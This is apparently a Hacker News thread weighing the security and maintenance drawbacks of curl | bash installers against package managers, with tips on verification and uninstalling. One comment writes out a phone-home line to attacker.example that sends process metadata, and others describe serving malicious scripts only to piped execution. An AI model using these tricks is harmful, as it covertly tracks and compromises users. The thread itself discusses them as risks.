For me personally, the security aspect isn't even the reason I dislike curl | bash installers. There's no standard behaviour for curl|sh, and it re-introduces many problems that were solved by package managers decades ago.
* Will it work? I'm on Arch Linux. This installer was probably tested on OSX and Ubuntu and deemed "portable". I've seen curl|sudo sh installers trying to apt-get install dependencies.
* Where does it place files? I've got a ~/.meteor folder that's 784MB. Why would you install software libraries and binaries to $HOME? I now have to tell my backup tool to ignore it when backing up my home partition, great. The FHS was established for a reason, people.
* Corollary to the previous question: How do I uninstall it? Maybe all files were installed to a hidden folder in ~/, maybe there's some stuff in /opt, or /usr/local, or who knows where else. If the installer doesn't implement uninstall functionality itself, I now have to go hunt for the stuff it placed in my filesystem.
I understand the need to be able to distribute your software without having to implement native packaging for OSX/Debian/Ubuntu/Red Hat/Fedora/Arch/...
Docker solved this problem. If you're feeling lazy when it comes to distributing your app, just ship a Docker container and be done with it.
> Corollary to the previous question: How do I uninstall it? Maybe all files were installed to a hidden folder in ~/, maybe there's some stuff in /opt, or /usr/local, or who knows where else.
How does one uninstall stuff on Linux anyway? My Linux boxes are always like trash cans - I add and add new stuff until it's time to upgrade either the system or the machine, so it gets wiped and replaced. I've never figured out how to delete stuff in a way that will not leave a ton of things behind...
Package managers deal well with files which they installed. What the app creates is your business... and for a good reason. You don't want random package upgrade / conflict to remove your data just because there's something changing about the binary.
The following generally works for me. It removes the installed files, including configuration files. Additionally it will remove any dependencies that were only used by packagename
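On Debian/Ubuntu that's something along these lines (packagename is just a placeholder):

$ sudo apt-get purge --auto-remove packagename

purge removes the package's config files as well, and --auto-remove drops any dependencies that were only pulled in for packagename.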
It's a best effort though; you're relying on the package maintainer to have tracked all the installed files and to clean up anything they might have modified, which hopefully you or something else hasn't modified after the package was installed.
The packages authored by distributions tend to be pretty good, but I've seen RPMs with nothing more than tar zxf in them and no tracking of the files installed.
The major package managers expect the package to manage the artifacts installed, this works if everyone plays nice and does their job...
You're right that this requires well-maintained packages, and this is one of the strengths of Debian: its policies that require well-maintained packages. If you install a package that's part of Debian, you can count on it being well-maintained, as opposed to one put out by a random web site or developer, which may install but may not integrate well or clean up after itself.
Package formats each have their own expectations. RPM likes being pointed to a source tarball, given the steps to build the project, and being given a list of the just-built files to include in the package. Those are the artifacts that RPM will manage (and they can be marked things like "doc", "config", or given specific attributes). Deb is broadly similar, but I feel like the framework is a little less controlled than the RPM one.
The manager basically just defines a framework. Packages can abuse that framework in various ways (I haven't even mentioned install triggers, to execute code when other named packages are added or removed). There are a lot of ways to get it wrong, but when the dev builds a good package, it's almost magic how nicely it works.
I often do this to find out what files were installed where.
$ touch now
$ sh install.sh
$ find / -newer now
That is supposing you trust install.sh of course.
You can redirect the output of find to a file for later removal. You will have to filter out false positives from the 'find' output, usually dev nodes.
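For example, something like this (the paths to exclude will vary per system):

$ touch now
$ sh install.sh
$ find / -newer now -not -path '/proc/*' -not -path '/sys/*' -not -path '/dev/*' > installed-files.txt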
I just don't understand this. I've used Debian and Ubuntu for many years, and I've never had to reinstall a single installation for any reason. I use packages whenever possible, and when installing unpackaged software, I use checkinstall to make a package from it. When I move to a new system or disk, I rsync the filesystem over and boot from the new disk. There is no accumulated cruft; or if there is, it's limited to e.g. tiny config files in /etc from older package versions, which aren't a problem or even noticeable.
The closest to cruft is hidden directories in my homedir from software I don't use anymore. That isn't a problem either: they don't take up much space, and it's easy to manually delete them if I ever feel like it. If not, they are compressed and deduplicated by backup software, and they're hidden by default, so who cares?
I wish I had your luck... A lot of fixes on forums constantly suggest to uninstall first. Which sometimes actually fixes issues. Other times it makes things worse. Either way - buying a lottery ticket soon?
> A lot of fixes on forums constantly suggest to uninstall first.
A lot of people seeking and offering help on forums are former Windows users, who are used to doing that to fix problems. They just don't know what else to do, so that's what they do.
And, sure, if you break a configuration file or package dependency, wiping the disk and reinstalling will fix that--but so would fixing the file or dependency. In my experience, the nuclear option is never necessary with Linux. Worst case, you boot off a CD or USB drive, mount the partition, chroot if necessary, fix it, and reboot.
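For instance, from a live environment (device and paths are just examples, adjust for your system):

$ sudo mount /dev/sda2 /mnt
$ for d in dev proc sys; do sudo mount --bind /$d /mnt/$d; done
$ sudo chroot /mnt /bin/bash
# fix the broken config or package (e.g. dpkg --configure -a), then exit and reboot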
> Other times it makes things worse.
That is very strange, indeed. D:
> buying a lottery ticket soon?
Haha, nope, been having this "luck" for years now, but it only seems to affect my Linux installs. :(
To be honest, I've solved many more problems with Linux by reinstalling (usually a different distribution) than with Windows.
And just yesterday my Linux did what I've never seen an OS do before - it lost its UI clock display. The solution was simple and typical for Linux - it involved killing a random process. But at that moment I realized that we used to laugh that rebooting stuff is the Windows way of doing things. Not anymore, apparently.
> And just yesterday my Linux did what I've never seen an OS do before - it lost its UI clock display. The solution was simple and typical for Linux - it involved killing a random process.
What desktop environment was that? There are many different ones available for Linux systems, and they don't all behave that way. e.g. I've never had that kind of problem with KDE3/TDE or KDE4.
My favorite is still hunting down .lck files with strace because of a bad lock file implementation. Reinstalling definitely fixes that one :). Looking at you, firefox and yum!
>For me personally, the security aspect isn't even the reason I dislike curl | bash installers. There's no standard behaviour for curl|sh, and it re-introduces many problems that were solved by package managers decades ago.
Every time I've seen it used, curl | bash is simply a way to deal with the fact that the users all have different package managers (often with outdated software) and quite complicated workflows to get stuff set up with them because there were problems that the package manager didn't solve.
>Docker solved this problem.
Ironic. Docker is one of those applications. And they used to ask for it to be installed with a curl pipe.
They seem to have replaced it with what is effectively a script executed with human hands. Not really an improvement.
I was genuinely confused with regard to your last point.
There's a section on their website[0] with installation instructions for various distributions using repositories and package managers. In other words, the right(tm) way of doing software distribution on Linux.
But then on a different part of their website I found the curl | sh instructions you allude to[1]. Bizarre that they still support that installation method.
To make matters worse, the big orange "Get Started" call to action button actually leads to the curl|sh installation instructions. In light of that I certainly can't blame you for not knowing about the proper distribution packages.
That curled script actually installs the 'proper' distribution packages. It has a lot of clever stuff to figure out which environment it's running on and then does whatever commands are necessary - including, e.g., adding keys so that the external repos where docker is hosted are trusted.
Point being that even if you install "the right way" on linux using package managers it's still a multi-step complicated process that benefits from being automated in a bash script.
It's really a shame that you have to wrap the best-practices approach in a bad practice in order to make it convenient.
> Point being that even if you install "the right way" on linux using package managers it's still a multi-step complicated process that benefits from being automated in a bash script.
Right, because distributions want different things than software authors.
If you're a Debian/Ubuntu/RHEL maintainer, you want stable, tested versions of software that you can vouch for and support for several years.
If you're the maintainer of an application, in this case Docker, you want your users to run the latest and greatest version of your software. You can't just demand that each distro ship the latest and greatest version of your software. So if you're Docker you end up having to do the following for each distro:
* package the software for that distro
* sign that package
* serve your own repository containing that package
* ask your users to add the repository
* ask your users to trust the signature
And then finally your users can install the package.
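On a Debian-based system, the user-side half of that ends up looking roughly like this (URLs, suite and package names are illustrative):

$ curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
$ echo "deb https://download.docker.com/linux/ubuntu xenial stable" | sudo tee /etc/apt/sources.list.d/docker.list
$ sudo apt-get update && sudo apt-get install docker-ce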
That's one of the reasons I like running Arch Linux on my workstation. The desires of the software authors, distro maintainers and users align.
Docker Inc: "Hey wouldn't it be cool if your users could install the latest
stable version of Docker?"
Arch Linux maintainers: "Yeah, it would. We'll keep the latest version in the
repo and our users can just `sudo pacman -S docker`"
Docker Inc: "Cool."
Arch Linux users: "Cool."
You should try openSUSE Tumbleweed. It actually is faster at releasing new packages than Arch in some cases, and has much more testing and stability from my experience. But it should be noted there are good reasons to want stable software especially with Docker (which is something I actually maintain for SUSE systems) -- there's been a lot of very invasive architectural changes in the last 3 or 4 releases. And all of them cause issues and aren't backwards compatible or correctly handled in terms of how to migrate with minimal downtime.
FWIW, this is Meteor's justification in /usr/local/bin/meteor:
# This is the script that we install somewhere in your $PATH (as "meteor")
# when you run
# $ curl https://install.meteor.com/ | sh
# It's the only file that we install globally on your system; each user of
# Meteor gets their own personal package and tools repository, called the
# warehouse (or, for 0.9.0 and newer, the "tropohouse"), in ~/.meteor/. This
# means that a user can share packages among multiple apps and automatically
# update to new releases without having to have permissions to write them to
# anywhere global.
I used to do Linux packaging full-time and constantly hit limitations in what Linux packaging formats support or allow. There's still a lot of progress that could be made in that area, but unfortunately any attempt to improve will likely become that 15th competing standard XKCD refers to...
For dealing with this problem, as well as anything that's not already packaged, the checkinstall utility is very helpful. It intercepts filesystem calls and builds deb/rpm/tgz packages that you install with your distro's package manager. It's been packaged in Debian for a long time. Highly recommended.
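A typical run is something like this, from the source tree of whatever you'd otherwise `sudo make install`:

$ ./configure && make
$ sudo checkinstall
# checkinstall runs "make install" under the hood and wraps the result in a
# .deb/.rpm/.tgz you can later remove with your normal package manager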
I don't think that's nearly as clever a counter-argument against curl|bash as they appear to think.
A few points of the shortcomings of curl|bash vs RPM and others:
* curl|bash is not transactional. If you have an install/upgrade process in a different tab, and you close your terminal accidentally, how do you know if the install/upgrade completed?
* There's no obvious uninstall method, and you need to read the docs to see what, if anything, you should remove outside the main directory.
* There's no way of verifying if files have been tampered with post installation (see the example after this list). This has negative security and operational consequences.
* It's much more vulnerable to MiTM attacks - a proxy with a successfully faked certificate can trivially modify a bash script on the wire and add a malicious command to it. This is hard for a user to detect. Packages are (on most distros) installed via package managers that verify GPG signing keys, making in-flight modification far more difficult.
* Packages are much more auditable - I can download a package and inspect it, and know that it will run the same actions on every machine it's deployed to. curl|bash can trivially serve different instructions to different requests, based on whatever secret criteria the server operator decides.
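On the verification point above, with proper packages you get tamper checking more or less for free, e.g. (packagename is a placeholder):

$ rpm -V packagename      # RPM-based distros: reports files whose size/checksum/permissions changed
$ debsums -c packagename  # Debian/Ubuntu: lists files whose checksums no longer match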
If you're going to argue that instead of doing what the generally accepted $good_thing is, people should use a $quick_and_easy solution that's widely perceived to be insecure, then when you argue in defence of your position, you need to make very sure that you're not just trying to justify laziness. I don't think sandstorm have really thought about this hard enough.
I think the many discussions about this conflates two things:
1. "curl|bash" vs "curl >install.sh; sh install.sh"
2. install scripts vs package managers
The OP talks about how to detect a streaming execution of a script and exploit it. This proof-of-concept exploit aims at discouraging the use of curl|bash as a means of installing code, and instead promotes at least saving the script (and reviewing it), i.e. the "curl >install.sh; sh install.sh" approach.
All of the points you mentioned are valid and important pain points that affect any arbitrary executable install script (not verified cryptographically using a side channel). Deciding whether to use an install script or a packaging system is really a tradeoff.
The "obvious" problem the OP was talking about was that smell you feel when you see piping code to bash. I think OP made an excellent job showing how you can make it harder for people to spot and audit malicious code and how this is pretty serious downside for piping code into bash; It's more like: "I have a gut feeling this is horrible, so let's think about a way to prove that gut feeling", and the proof is insightful and non obvious.
(almost) all of your points are fair, but slightly tangential to their article: they want to put the "curl | bash is _insecure_" myth to rest. They explicitly acknowledge that it is worse than package managers in many ways.
Perhaps they should have said: "however, the following non-security arguments are valid, and there are more we didn't list." Agreed.
But, at the end of the day, they're right: it's not _less secure_ than, e.g., npm.
PS: In your list; "It's much more vulnerable to MiTM attacks" --- that's essentially the PGP vs HTTPS argument in disguise. Which they also cover, and acknowledge to be true; the argument is essentially "curl https:.. | bash is not less secure than any HTTPS based method, including npm, .isos, etc."
EDIT: and because this is such a hot topic, I just want to emphasize: I'm not arguing in favor of curl | bash. This is only a counter-argument to "curl | bash is less secure than other https- based install methods".
Many of my points have a security element to them. Such as inability to verify if files have been tampered with, inability to audit beforehand what the script will do and ease of MiTM attacks.
My point with the PGP argument is that you can indeed go through all those steps to verify their install script with GPG (although note that on top of the steps they run, you should ideally also verify the script against a known hash that you verified elsewhere to make sure that the contents of the script is what you expect, as well as the authors).
But the manual GPG verification process will be ignored by almost all users, who will decide they can't be bothered. My point about package managers is that they do this automatically, without requiring the user to jump through extra hoops. Which is much better than the 8 additional steps that almost no-one will bother with, in practice.
Also saying that it's not less secure than npm isn't a great benchmark - npm is really bad too. See the recent left-pad issues, for example. So yeah - it's not really much worse than other things which are also bad. But it's a lot worse than doing it properly, with a signed RPM repository.
> verify their install script with GPG (although note that on top of the steps they run, you should ideally also verify the script against a known hash that you verified elsewhere to make sure that the contents of the script is what you expect, as well as the authors).
If you've verified the script with GPG, the extra step of a hash is wholly unnecessary. Any change to the script's contents would immediately invalidate the GPG signature.
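For reference, the manual dance is something like this (key ID, URL and filenames are hypothetical):

$ gpg --recv-keys 0xDEADBEEF12345678           # then verify the key's fingerprint out of band
$ curl -O https://example.com/install.sh
$ curl -O https://example.com/install.sh.sig
$ gpg --verify install.sh.sig install.sh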
if you want to audit the script before you run it, you can just save it into a file first and then run it.
The point of these one-liners is to allow anybody to install it. It's insecure as hell, but whether you're piping it directly to bash or downloading an installer file and then executing it (which is how a great deal, if not most, of software is still distributed to the general public anyway) doesn't make a big difference.
That's why the linked article is interesting; it shows that in fact there is a difference between piping to bash and downloading an installer. The difference is important and concerns auditability. Anyone who cares to audit the script might not notice anything suspicious, but people who blindly pipe it to bash can potentially run code that is not the same as what auditors see.
What's basically happening is that either a malicious software publisher or a MiTM fools auditors. And fooling auditors is bad because a lot of people rely on the community to signal this kind of abuse.
What an auditor could do to detect this kind of malware distribution is:
curl https://foo/bar.sh | tee >(md5sum) | sh
If she gets a different hash than by fingerprinting a saved download, it's an indication that the server is tampering with the installer.
However, people who follow good practices and want to audit the script are not affected by the problem in the first place, because they will just save the script and they will know how to execute it after having read it.
People who don't know how to audit the installer in the first place might not even know how to verify the download with GPG as well. Or worse, they won't bother and might deem the software to be too hard to install and choose to use something worse.
That's why sandstorm offers PGP-verified installs for those who know what they're doing and show how to use keybase to solve the web of trust issue.
(I'm not affiliated with sandstorm, but they seem a very reasonable and competent bunch to me)
> I don't think sandstorm have really thought about this hard enough.
I suspect we've spent far more time thinking about this than most people. We've heard every argument many times. The referenced blog post specifically addresses the security argument (hence the title) because that's the one we feel is most misleading.
I absolutely agree that curl|bash is ugly compared to package managers, but there are some serious shortcomings of package managers too, and it's a trade-off. With deb or rpm, we are tied to the release schedules of the distros, which is unreasonably slow -- Sandstorm does a release every week whereas most distros don't release any more often than twice a year.
We can perhaps convince people to add our own servers as an apt source or whatever, but now the MITM attack possibility is back. Yes, packages are signed, but you'd have to get the signing key from us, probably over HTTPS. No one wants to do the web of trust thing in our experience (I know because we actually offer this option, as described in the blog post, and sadly, almost no one takes it).
The Sandstorm installer actually goes to great lengths to be portable and avoid creating a mess. It self-containerizes under /opt/sandstorm and doesn't touch anything else on your system. This actually means that Sandstorm is likely to work on every distro (given a new enough kernel, which the installer checks for). If we instead tried to fit into package managers, we'd need to maintain half a dozen different package formats and actually test that they install and work on a dozen distros -- it would get pretty hard to do that for every weekly release. (Incidentally, Sandstorm auto-updates, and it does check signatures when downloading updates.)
So, yeah, it's pretty complicated, and we're constantly re-evaluating whether our current solution is really the best answer, but for now it seems like what we have is the best trade-off.
What happens if your webhost is hacked and someone installs a malicious install.sh? Without a published signature to verify against, there's no way to detect it.
We do provide a signature. But of course if you're going to check the signature, you need to get our public key from somewhere. You can't just get it from our server, because then you have the same problem: if someone hacked our server then they could replace the key file with their own. We publish instructions to actually verify the key here: https://docs.sandstorm.io/en/latest/install/#option-3-pgp-ve... But as you can see, it's complicated, and most people aren't going to do it. If you're not going to go through the whole process, then checking a signature at all is pointless.
Note that distributing Sandstorm as .debs or .rpms wouldn't solve this, because we'd still be distributing them from our own server, and you'd still need to get our key from somewhere to check the signature.
If you use checkinstall(1) it'll see what `sudo make install` would do, and create a local package that would do that (e.g. a deb on ubuntu). This package can then be installed in the usual manner, which gives you uninstallability, transactionality, and ensures you don't overwrite any other files installed via a package. This is much better than curl|bash.
Correct me if I'm wrong but can't you also run arbitrary code while installing packages?
Either way I'm not saying `curl | bash` is good, I'm just trying to point out that people have a very knee jerk reaction to it and pay no mind to things which are similarly as dangerous.
I disagree. Many (probably most) makefiles conform to the GNU Coding Standards, which recommend declaring "all" to be the default make target. `make all` does not install; that's what `make install` is for.
The idea of the original parent comment on Make is not about well conforming makefiles.
The idea is that if one doesn't trust a random curl-ed install file, they shouldn't trust a downloaded makefile either -- and for the same reasons, yet tons of people complain about the first, but have been using the latter for decades without complaint...
Recently I stumbled across hashpipe: "hashpipe helps you venture into the unknown. It reads from stdin, checks the hash of the content, and outputs it IF AND ONLY IF it matches the provided hash checksum." [https://github.com/jbenet/hashpipe]
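Based on that description, usage would presumably be along these lines (the hash argument is just a placeholder):

# placeholder multihash; use the one the author publishes
curl https://example.com/install.sh | hashpipe QmExpectedMultihashGoesHere | sh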
Binaries and some websites are signed with a verified legal entity.
This is what the Debian guys standing in a circle holding their passports are doing at your Linux event. It's also why when you visit github it says 'GitHub, Inc [US]' in your browser's address bar. Heads up: I work on the latter.
Sure but SSL identification is a very small part of the process of having a "trusted source".
There is, I'm sure, malicious software hosted on github, so I can download things from that trusted source and still have trouble.
There is insecure software hosted on github; again, there's no protection based on the hosting company.
If a developer who hosts a repository on github has their credentials compromised, their software may become malicious.
Also as an end-user (particularly a non-paying one) I have no visibility of Githubs own security policies and practices, so assessing the level of trust placed there is tricky.
The debian model has more checks and balances (i.e. it's harder to get from one set of compromised creds to a malicious package in a production repo.) but still not perfect...
Ahh but that's one of the hardest pieces of the trust puzzle.
On the internet, how do you know who's who? You download a package from npm. Who wrote it, what's their background, where do they work? What are their security practices like, and what are the security practices of the hosting company?
So we say Red Hat/Apache are more trusted, sure. That's one of the reasons I dislike curl|bash from random sites: there's no way of assessing trust in that software or its origin...
>On the internet, how do you know who's who? You download a package from npm. Who wrote it, what's their background, where do they work? What are their security practices like, and what are the security practices of the hosting company?
Check the npm package's ratings, and the github repository watchers and stars.
Try to find and read a few posts (and their comments) on the package. The more respected the source (e.g. HN comments vs comments on Digg), the better.
That's not a bad mechanism (if a bit time-consuming) for personal usage, but it wouldn't likely work for corporate use...
Even there though all it does is move the problem one step away. Most npm packages have dependencies (and quite a few of them), you have no way of knowing whether the author of the main package did the checks you describe for their dependencies...
>Even there though all it does is move the problem one step away. Most npm packages have dependencies (and quite a few of them), you have no way of knowing whether the author of the main package did the checks you describe for their dependencies...
That's the nice thing: you don't need to. You just need to trust that the main package works well enough -- and you get that from the fact that it is in widespread use (many downloads, watchers, stars, posts, etc).
In security, where breaches can cost a lot of money, relying on heavy use as an indication of trustworthiness may not be a great idea.
For example OpenSSL was and is used by lots of people, this has not stopped it having a lot of security problems...
And true once the vulnerabilities get published you get to know about the problems more quickly but then in a world of targeted attacks and professional exploitation that might not be great comfort..
It doesn't fail, it's still as usable as ever -- just not infallible, which nothing is anyway.
The dynamics of something with a larger user base being more trustworthy don't change because we're on the internet. It's a simple network (no pun intended) effect.
If the program "can download custom instructions after installation" then a large user base still means that users will be bound to find it sooner or later (and make it public/fix it) and it makes it less likely to be you (because you're 1 from 200,000 downloading it, not 1 of 20 or 200).
Every time I see that I just wget the script and inspect it. If it does anything too clever, I don't install it that way. If I can't reason about the shell script something is wrong.
It's like being emailed a .bat file in 1999. Would you blindly run it on your Windows box?! I hope not!
The unfortunate problem with this is that while piping directly into bash can be exploited, it remains as one of the easiest ways to install programs.
Take RVM, for example. Their instructions are to run this: `curl -sSL https://get.rvm.io | bash -s stable`. The script that is executed is 887 lines long. The installation is "complex", requiring a lot of different stages. Now, the solution to this is "use a package manager". Sure, that works in a lot of cases. However, when you have something like RVM, which is used across several major operating systems and hundreds of different flavours, each with their own quirks and package managers, it suddenly gets difficult to manage each of these.
The problem we face is, how can we make it easy to install something, while still being safe and maintainable?
Breaking this down further, there are 2 issues to solve. The first is "How do we ensure what we download is what the maintainer says that we should download?", i.e. how do we make sure there are no malicious injections? That one is simple: use SSL.
The second issue is, "I want to install this thing but I don't know if I can trust the installer". Are you crazy!? This isn't an issue. If you don't trust the installer, you sure as hell can't trust the product. If you don't trust either of them, then you automatically don't trust the other and shouldn't be installing it.
The result is that, yes, people can maliciously serve up code when you pipe the output of curl through bash without you realising. However, this is no different than blindly trusting and installing a script.
> If you don't trust the installer, you sure as hell can't trust the product
I can't think of ten pieces of software with excellent installers.
Software distributors generally pay very little attention to the installer. That is because installers are written by people who want to try and make it easy to install something, and don't really care about anything else. If they can get you to install something, helping you remove it isn't their problem.
If they can get you to install something, protecting you from really unlikely things like someone hacking their CDN and delivering malware is a high quality problem: Either they have enough users so that they will be forgiven, or they won't have enough users and the project is abandoned anyway.
I don't trust installers.
I don't trust installers to document what they're doing, or tell me where files go, because they don't.
I don't trust installers to deliver a secure transparent experience, because they don't.
I don't trust installers to consider conflicts, like what else do I have installed because they don't.
I don't trust installers to create security boundaries, protecting me and my files from bugs in the software, because they don't.
For things that are open source, I try to use the software in-tree without installing it. For other things, I evaluate using a virtual machine. Seriously, I don't trust installers because all of you are bad at them.
> The problem we face is, how can we make it easy to install something, while still being safe and maintainable?
Google, Apple, Microsoft, et al have recommended publishing platforms (aka "app stores") that are designed to specifically solve this problem.
For Debian and the derived, we can approach a Debian Maintainer and ask them for help getting it into Debian. For other distributions, we can take similar steps.
If we insist on publishing things ourselves, we can make our software really portable: Let it live in any directory, and not touch any files. Make it easy for the user to verify this.
If we can't do that, we can document the details: Explain all the files we touch and why, and recommend users create separate user accounts (or containers/virtual machines) to really protect themselves. Try to get people used to this level of care because having a positive experience with good software with excellent documentation[1] will give you pause when faced with anything else.
Honestly, the number of programs that want to run as root or as my user account is terrifying, and the amount of work necessary to sandbox unknown apps really makes me not want to bother. I know most people don't worry about this, so purely from a "hurr hurr move fast" point of view, this isn't anything anyone needs to worry about: `curl | bash` is good enough, and will likely be good enough for a long time.
I don't think the installer problem will ever get better, though the portable software idea would make things better as the application wouldn't be scattered all over the place.
It's why I stick everything in a container now, as then I don't care what software does to its filesystem, and I only push what directories I want it to have into it. This also lets me run multiple versions of software when the software does not normally support that.
> However, when you have something like RVM which is used across several major operating systems, and hundreds of different flavours, each with their own quirks and package managers it suddenly gets difficult to manage each of these.
I'm not sure that really changes with an install script. You've got several major operating systems, hundreds of flavours with all kinds of quirks. And you don't even know what shell you're really running on. How do you know your install script will work in any reasonable way?
For example, all reasonable package managers will make sure existing files aren't overwritten, existing configs are not modified, all ownership/modes are reasonable by default. Sure, you can override that in post-install script, but it will stand out that you're doing something non-standard, because there's a post-install script.
> how can we make it easy to install something, while still being safe and maintainable?
> Are you crazy!? This isn't an issue. If you don't trust the installer, you sure as hell can't trust the product.
I do not trust either the installer or the app. If I have a simple package to deploy, I can: 1) check that there are no post/pre-install scripts 2) install the files on the system 3) contain/sandbox them using selinux / grsec / apparmor / chroot / separate user. I cannot easily do the same thing with an installer script, which by definition wants to merge foreign files into my running system.
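Step 1 is cheap when you have an actual package file, e.g. (filenames are placeholders):

$ rpm -qp --scripts package.rpm              # print any pre/post-install scriptlets
$ dpkg-deb -e package.deb ctrl && ls ctrl/   # extract control files; look for preinst/postinst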
Even better, it's in the interest of app creator to care about this and provide sandboxing by default, even if they trust the app.
"a knowledgable user will most likely check the content first.". Really? I'm knowledgeable in that I understand that the script may contain evil, but I'm lazy as hell so I don't bother to check 99% of the time. Like I clone, build and run repos without checking every SLoC.
Sorry, but I fail to see the difference with downloading and installing without verifying the code. And since verifying the code is usually hard, I don't see the significance of this article.
The difference is in the article itself. Regardless of whether most people verify the scripts that they run (we should! But we don't), the curl | bash paradigm, as explained in the article, actually makes it possible for the attacker to provide two different types of scripts depending on the situation.
Are we dealing with a smarter-than-average user that is downloading the script and then running it (who knows, he might actually read it too!)? Let's serve a legit one. Are we dealing with somebody who's just mindlessly piping curl output into sh? We found our victim!
This allows a malicious server to send you different content when you pipe to bash than it sends your browser (or even to a script), hiding the attack from people that give the script at least a cursory look.
It's fundamentally not much worse than curl > file.sh && sh ./file.sh, but even a victim who would have noticed something odd never gets the chance, because all the oddity stays invisible.
> Installing software by piping from curl to bash is obviously a bad idea and a knowledgable user will most likely check the content first
While this is true, how is this any different from installing using apt-get/dpkg/rpm ? I have never looked into any package I install. In fact, those things are worse because they require root unlike curl | bash.
At the end of the day it's about trust. If you trust the author(s), you would install it. I trust my distribution/browser/OS and I install things they want me to install it. So, if a project suggests "curl | bash", I would do it when I trust the project.
It's not just about trusting that project. It's about trusting that project to understand relevant interactions with the rest of your system, which may include components or configurations that project's authors have never heard of.
Developers can screw up even with the best of intentions.
I trust distributions more because interactions between components is pretty much all they deal with. That's their specialty.
I'm a distribution developer. I know first hand how often upstream projects screw up due to naivety, because it's my day job to fix their bugs.
Don't get me wrong, I definitely don't think that curl|bash can replace package managers. curl|bash can be used for getting software which doesn't need the sophistication (and effort) of creating packages.
I think you'll still hit the buffer of tee in that case, which may still cause the problem. I'd recommend just saving the file and executing it afterwards.
I wrote up a little utility I wanted to distribute last year, and I came up with this little script block to do it while also verifying the script's hash:
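A minimal sketch of that block (the hash value below is only a placeholder):

URL=https://www.tillberg.us/c/blah/gut-1.0.3.sh
HASH=0000000000000000000000000000000000000000000000000000000000000000   # placeholder sha256
curl -sSL "$URL" -o /tmp/gut.sh \
  && echo "$HASH  /tmp/gut.sh" | shasum -a 256 -c - \
  && sh /tmp/gut.sh
rm -f /tmp/gut.sh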
This downloads the file to /tmp/gut.sh (which hopefully works on your system), then checks whatever file was downloaded against the hash specified (which hopefully works on your system), then executes it, then deletes it.
I think that `shasum` is a pretty widely-available utility among Linuxes and OSX, though not universal, but it occurred to me that it would be really awesome to have a program that was more purpose-built to only execute shell scripts that matched a particular hash, a la:
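Something along the lines of (the utility name and hash are hypothetical):

# "sha-exec" doesn't exist; it's the kind of purpose-built tool meant here
curl -sSL https://www.tillberg.us/c/blah/gut-1.0.3.sh | sha-exec 0000000000000000000000000000000000000000000000000000000000000000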
Obviously, many other systems are more "secure" than curl-bashing, but curl-bashing is very convenient, and adding some sort of common utility to support it could mitigate the most obvious security issues.
Your approach tackles the scenario that the actual shell script `https://www.tillberg.us/c/blah/gut-1.0.3.sh` might be untrustworthy, but the whole command including the verification hash will most likely also be downloaded from `tillberg.us`.
If `tillberg.us` is malicious, you have to assume that both the gut-1.0.3.sh file and the hash in the curl command will be changed.
So I think your idea only works when you reference files hosted with a third party but decide to trust the guy who gives you the hash. Basically all occurrences of curl-to-bash piping I have seen in the wild are of the former type, so I really don't think this helps much.
It sounds good, but if you're distributing the hash through the same channel as the script, then it's open to the same vulnerability (MITM, website breach, whatever)
> adding some sort of common utility to support it could mitigate the most obvious security issues.
What's funny is that they suggest adding a sleep in the script so that it can be detected as a delay in byte stream delivery, but if you really want to know if the script is being executed and by what, you could literally just have the first line of the script make an http request with whatever meta data you want.
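E.g. something as simple as this at the top of the served script (the URL is hypothetical):

# phone home with whatever metadata you like, e.g. the parent process name
curl -s "https://attacker.example/ping?parent=$(ps -o comm= -p $PPID)" >/dev/null 2>&1 &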
You can't personally attack people like this on HN. Prefixing rudeness with a fig leaf like "I don't want to be rude" doesn't help. You've done this kind of thing in other comments, too. Please take the HN guideline about not calling names in arguments to heart: https://news.ycombinator.com/newsguidelines.html.
He incorrectly accounted for another user's greater success by calling the user lucky. In fact, what the other user has is greater competency; he could improve himself by learning from it instead of dismissing it as luck.
He called me a jackass; I merely stated that he should improve his understanding.
It's hard to tell someone kindly that they are incorrect.
I work as a linux admin professionally and work with four different distros on a daily basis. Simply, I don't have enough time to fix every fucking issue that happens on my operating system that prevents something from being installed. And this happens constantly. Is it incompetence when the shitty apt/yum/aur repos are broken by default, such that $ASININEPACKAGE has to be uninstalled and then reinstalled later for $DUMBSHITPACKAGE? If someone has a solution that works for many, I will try that, then bitch when it doesn't work, then use the competency you think I don't have to fix it.
It's easy to understand why someone would lash out in response to having their competence snidely negated, but it still damages the community if you do that, so please don't.
Sorry about that. I'll edit my comment. If I still have your attention, actually, would you mind deleting my account and possibly the comments? I've seen lots of comments on here saying that it's difficult to get a response for deletion, so raising it here might work better. I've been spending too much time on here. :)
> I've seen lots of comments on here saying that it's difficult to get a response for deletion
I'm surprised. Those comments must be wrong. We respond to this at hn@ycombinator.com all the time.
HN doesn't delete accounts. We do delete specific posts that people are worried about getting in trouble from. The reason is because deleting an account and all its comments guts the threads that account participated in, which is unfair to the other commenters in the discussion. The threads are community property and we have a responsibility to preserve them. PG wrote about this here: https://news.ycombinator.com/item?id=6813226.
Our approach tries to balance that concern with individual needs. Sometimes people post things they later regret, e.g. personal or employer info. In such cases we're happy to help by redacting or deleting the comment. But we do it on a case-by-case basis. That way people can get their specific concerns taken care of, but the community history remains largely intact.
We do intend to implement account renaming, which should resolve most remaining concerns. But it isn't done yet.
I genuinely appreciate the response and fully agree with the reasoning. I guess the posts I saw were some weird form of survivorship bias. Curious what happened there, but "shit happens" sounds pretty valid. :)
Like I said earlier, I wanted to delete my account just to remove this as a time sink, but it's a bit more than that. The minor reprimand for name calling was a minor confirmation of it, but one of the things I've seen of late is that many posts are incredibly critical of things that often don't deserve it. For example, a few of my posts about personal experiences with mental health are met with strong, undeserved, and almost angry criticisms towards my experiences. It feels overkill, and many times it validates the hostility that those with mental health issues have when discussing these issues. HN seems to be one of the harshest sites I've seen on this subject. I mention the reprimanding, since that's a "hard insult", rather than the "soft insults" I've seen during mental health discussions. They both carry a similar weight, but one (for understandable reasons) sounds sharper, so is easier to handle and parse from someone who's dropping into the discussion. Maybe what I've seen is just a few bad eggs, but others have shared similar experiences - though that may just be the converse of the bad eggs.
Is there anything that can be done to help out here? I'm not calling for any individual solution and by no means asking for censorship of any form, but it's something that's been on my mind recently, since unnecessary hyper-critical responses feel just as damaging to a community as direct insults are. It's a stupidly difficult problem, but possibly worth mentioning. I'm sure you guys have discussed this before, though.
(Sorry for the mild rant, and this probably isn't the best place to discuss this, so please feel free to delete this and I can shoot an email instead.)
But you detach things that are "bad", moving them to the top-level so they get more visibility and still disemboweling any discussions they were part of.
I've seen some stupid moderation policies in my day, and this is definitely up there.
